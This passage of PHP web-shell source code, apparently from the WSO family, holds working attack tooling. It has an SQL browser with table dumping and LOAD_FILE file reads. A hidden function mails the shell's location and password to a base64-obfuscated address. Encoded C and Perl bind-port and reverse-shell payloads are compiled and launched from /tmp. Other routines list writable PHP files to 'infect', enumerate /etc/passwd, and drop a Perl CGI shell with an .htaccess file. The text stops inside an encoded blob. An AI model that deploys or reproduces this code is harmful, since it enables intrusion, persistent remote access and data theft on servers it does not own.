1507. header("Content-Type: text/plain");
1508. foreach($_POST['tbl'] as $v)
1509. $db->dump($v);
1510. exit;
1511. }
1512. printHeader();
1513. ?>
1514. <h1>Sql browser</h1><div class=content>
1515. <form name="sf" method="post">
1516. <table cellpadding="2" cellspacing="0">
1517. <tr>
1518. <td>Type</td>
1519. <td>Host</td>
1520. <td>Login</td>
1521. <td>Password</td>
1522. <td>Database</td>
1523. <td></td>
1524. </tr>
1525. <tr>
1526. <input type=hidden name=a value=Sql>
1527. <input type=hidden name=p1 value='query'>
1528. <input type=hidden name=p2>
1529. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1530. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST
1531.  
1532. ['charset']:''?>'>
1533. <td>
1534. <select name='type'>
1535. <option value="mysql" <?php if(@$_POST['type']=='mysql')echo
1536.  
1537. 'selected';?>>MySql</option>
1538. <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo
1539.  
1540. 'selected';?>>PostgreSql</option>
1541. </select></td>
1542. <td><input type=text name=sql_host value='<?=(empty($_POST
1543.  
1544. ['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1545. <td><input type=text name=sql_login value='<?=(empty($_POST
1546.  
1547. ['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1548. <td><input type=text name=sql_pass value='<?=(empty($_POST
1549.  
1550. ['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1551. <td>
1552. <?php
1553. $tmp = "<input type=text name=sql_base value=''>";
1554. if(isset($_POST['sql_host'])){
1555. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1556. switch($_POST['charset']) {
1557. case "Windows-1251": $db->setCharset('cp1251'); break;
1558. case "UTF-8": $db->setCharset('utf8'); break;
1559. case "KOI8-R": $db->setCharset('koi8r'); break;
1560. case "KOI8-U": $db->setCharset('koi8u'); break;
1561. case "cp866": $db->setCharset('cp866'); break;
1562. }
1563. $db->listDbs();
1564. echo "<select name=sql_base><option value=''></option>";
1565. while($item = $db->fetch()) {
1566. list($key, $value) = each($item);
1567. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.
1568.  
1569. $value.'</option>';
1570. }
1571. echo '</select>';
1572. }
1573. else echo $tmp;
1574. }else
1575. echo $tmp;
1576. ?></td>
1577. <td><input type=submit value=">>"></td>
1578. </tr>
1579. </table>
1580. <script>
1581. function st(t,l) {
1582. document.sf.p1.value = 'select';
1583. document.sf.p2.value = t;
1584. if(l!=null)document.sf.p3.value = l;
1585. document.sf.submit();
1586. }
1587. function is() {
1588. for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1589. document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]']
1590.  
1591. [i].checked;
1592. }
1593. </script>
1594. <?php
1595. if(isset($db) && $db->link){
1596. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1597. if(!empty($_POST['sql_base'])){
1598. $db->selectdb($_POST['sql_base']);
1599. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid
1600.  
1601. #666;'><span>Tables:</span><br><br>";
1602. $tbls_res = $db->listTables();
1603. while($item = $db->fetch($tbls_res)) {
1604. list($key, $value) = each($item);
1605. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1606. $value = htmlspecialchars($value);
1607. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a
1608.  
1609. href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1610. }
1611. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump'
1612.  
1613. onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1614. if(@$_POST['p1'] == 'select') {
1615. $_POST['p1'] = 'query';
1616. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1617. $num = $db->fetch();
1618. $num = $num['n'];
1619. echo "<span>".$_POST['p2']."</span> ($num) ";
1620. for($i=0;$i<($num/30);$i++)
1621. if($i != (int)$_POST['p3'])
1622. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i
1623.  
1624. +1),"</a> ";
1625. else
1626. echo ($i+1)," ";
1627. if($_POST['type']=='pgsql')
1628. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.
1629.  
1630. ($_POST['p3']*30);
1631. else
1632. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']
1633.  
1634. *30).',30';
1635. echo "<br><br>";
1636. }
1637. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1638. $db->query(@$_POST['p3']);
1639. if($db->res !== false) {
1640. $title = false;
1641. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1642. $line = 1;
1643. while($item = $db->fetch()) {
1644. if(!$title) {
1645. echo '<tr>';
1646. foreach($item as $key => $value)
1647. echo '<th>'.$key.'</th>';
1648. reset($item);
1649. $title=true;
1650. echo '</tr><tr>';
1651. $line = 2;
1652. }
1653. echo '<tr class="l'.$line.'">';
1654. $line = $line==1?2:1;
1655. foreach($item as $key => $value) {
1656. if($value == null)
1657. echo '<td><i>null</i></td>';
1658. else
1659. echo '<td>'.nl2br(htmlspecialchars
1660.  
1661. ($value)).'</td>';
1662. }
1663. echo '</tr>';
1664. }
1665. echo '</table>';
1666. } else {
1667. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1668. }
1669. }
1670. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars
1671.  
1672. ($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1673. echo "</td></tr>";
1674. }
1675. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile
1676.  
1677. \";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp'
1678.  
1679. type=text name=f><input type=submit value='>>'></form>";
1680. if(@$_POST['p1'] == 'loadfile') {
1681. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1682. $file = $db->fetch();
1683. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1684. }
1685. }
1686. echo '</div>';
1687. printFooter();
1688. }
1689. function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off');
1690. $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
1691.  
1692. Uname: '.substr(@php_uname(), 0, 120).'
1693.  
1694. Pass: http://www.hashchecker.de/'.$auth_pass.'
1695.  
1696. IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("RFowN19YX1RFQU1AWUFIT08uQ09N");$su=gethostbyname($HTTP_HOST);$mh="From:
1697.  
1698. {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
1699.  
1700.  
1701. function actionNetwork() {
1702. printHeader();
1703. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg
1704.  
1705. +DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgIC
1706.  
1707. BpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc
1708.  
1709. 2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9
1710.  
1711. IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiw
1712.  
1713. gc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCi
1714.  
1715. AgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZ
1716.  
1717. Ck7DQp9";
1718.  
1719.  
1720. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw
1721.  
1722. 0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7D
1723.  
1724. Qpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRy
1725.  
1726. KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCA
1727.  
1728. iPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1729. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg
1730.  
1731. +DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaT
1732.  
1733. sNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX
1734.  
1735. 1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2ko
1736.  
1737. YXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB
1738.  
1739. 4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgIC
1740.  
1741. AgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mK
1742.  
1743. HApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0K
1744.  
1745. ICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9
1746.  
1747. zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1748.  
1749.  
1750. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc
1751.  
1752. 29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nr
1753.  
1754. b3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGV
1755.  
1756. uIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcG
1757.  
1758. lkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsI
1759.  
1760. j4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI
1761.  
1762. +JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw
1763.  
1764. 0KCX0NCn0=";
1765. ?>
1766. <h1>Network tools</h1><div class=content>
1767. <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1768. <span>Bind port to /bin/sh</span><br/>
1769. Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'>
1770.  
1771. Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit
1772.  
1773. value=">>">
1774. </form>
1775. <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1776. <span>Back-connect to</span><br/>
1777. Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text'
1778.  
1779. name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option
1780.  
1781. value='bcp'>Perl</option></select> <input type=submit value=">>">
1782. </form><br>
1783. <?php
1784. if(isset($_POST['p1'])) {
1785. function cf($f,$t) {
1786. $w=@fopen($f,"w") or @function_exists('file_put_contents');
1787. if($w) {
1788. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents
1789.  
1790. ($f,@base64_decode($t));
1791. @fclose($w);
1792. }
1793. }
1794. if($_POST['p1'] == 'bpc') {
1795. cf("/tmp/bp.c",$bind_port_c);
1796. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1797. @unlink("/tmp/bp.c");
1798. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1799. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1800. }
1801. if($_POST['p1'] == 'bpp') {
1802. cf("/tmp/bp.pl",$bind_port_p);
1803. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1804. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1805. }
1806. if($_POST['p1'] == 'bcc') {
1807. cf("/tmp/bc.c",$back_connect_c);
1808. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1809. @unlink("/tmp/bc.c");
1810. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1811. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1812. }
1813. if($_POST['p1'] == 'bcp') {
1814. cf("/tmp/bc.pl",$back_connect_p);
1815. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1816. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1817. }
1818. }
1819. echo '</div>';
1820. printFooter();
1821. }
1822.  
1823. function actionInfect() {
1824. printHeader();
1825. echo '<h1>Infect</h1><div class=content>';
1826. if($_POST['p1'] == 'infect') {
1827. $target=$_SERVER['DOCUMENT_ROOT'];
1828. function ListFiles($dir) {
1829. if($dh = opendir($dir)) {
1830. $files = Array();
1831. $inner_files = Array();
1832. while($file = readdir($dh)) {
1833. if($file != "." && $file != "..") {
1834. if(is_dir($dir . "/" . $file)) {
1835. $inner_files = ListFiles($dir . "/" . $file);
1836. if(is_array($inner_files)) $files = array_merge($files,
1837.  
1838. $inner_files);
1839. } else {
1840. array_push($files, $dir . "/" . $file);
1841. }
1842. }
1843. }
1844. closedir($dh);
1845. return $files;
1846. }
1847. }
1848. foreach (ListFiles($target) as $key=>$file){
1849. $nFile = substr($file, -4, 4);
1850. if($nFile == ".php" ){
1851. if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable
1852.  
1853. ($file))){
1854. echo "$file<br>";
1855. $i++;
1856. }
1857. }
1858. }
1859. echo "<font color=red size=14>$i</font>";
1860. }else{
1861. echo "<form method=post><input type=submit value=Infect name=infet></form>";
1862. echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect
1863.  
1864. \')">Yes</a></div>';
1865. }
1866. printFooter();
1867. }
1868.  
1869.  
1870. /* additional adds */
1871.  
1872. function actionReadable(){
1873. printHeader();
1874. echo '<h1>Subdomain</h1><div class=content>';
1875. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1876. set_time_limit(0);
1877. ###################
1878. @$passwd = fopen('/etc/passwd','r');
1879. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1880. $pub = array();
1881. $users = array();
1882. $conf = array();
1883. $i = 0;
1884. while(!feof($passwd))
1885. {
1886. $str = fgets($passwd);
1887. if ($i > 35)
1888. {
1889. $pos = strpos($str,':');
1890. $username = substr($str,0,$pos);
1891. $dirz = '/home/'.$username.'/public_html/';
1892. if (($username != ''))
1893. {
1894. if (is_readable($dirz))
1895. {
1896. array_push($users,$username);
1897. array_push($pub,$dirz);
1898. }
1899. }
1900. }
1901. $i++;
1902. }
1903. ###################
1904. echo '<br><br><textarea rows="20%" cols="100%" class="output" >';
1905. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1906. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1907. echo "[~] Searching for passwords in config files...\n\n";
1908. foreach ($users as $user)
1909. {
1910. $path = "/home/$user/public_html/";
1911. echo "$path \n";
1912. }
1913. echo "\n";
1914. echo "[+] Done...\n";
1915. echo '</textarea><br></body></html>';
1916.  
1917. echo '</div>';
1918. printFooter();
1919. }
1920.  
1921. function actionCgiShell(){
1922. printHeader();
1923. echo '<h1>Cgitelnet</h1><div class=content>';
1924.  
1925. mkdir('cgitelnet1', 0755);
1926. chdir('cgitelnet1');
1927. $kokdosya = ".htaccess";
1928. $dosya_adi = "$kokdosya";
1929. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
1930. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1931.  
1932. AddType application/x-httpd-cgi .cin
1933.  
1934. AddHandler cgi-script .cin
1935. AddHandler cgi-script .cin";
1936. fwrite ( $dosya , $metin ) ;
1937. fclose ($dosya);
1938. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
1939. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1940. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
1941. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1942. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
1943. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1944. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
1945. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
1946. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1947. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
1948. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
1949. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
1950. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
1951. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
1952. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
1953. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
1954. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
1955. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
1956. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
1957. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
1958. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
1959. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
1960. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
1961. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
1962. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
1963. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
1964. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
1965. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
1966. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
1967. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
1968. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
1969. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
1970. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
1971. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
1972. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1973. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
1974. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
1975. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
1976. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
1977. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
1978. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
1979. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
1980. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1981. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
1982. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
1983. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
1984. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
1985. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
1986. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
1987. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
1988. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
1989. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
1990. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
1991. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
1992. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
1993. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
1994. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
1995. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
1996. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
1997. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
1998. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
1999. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
2000. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
2001. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
2002. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
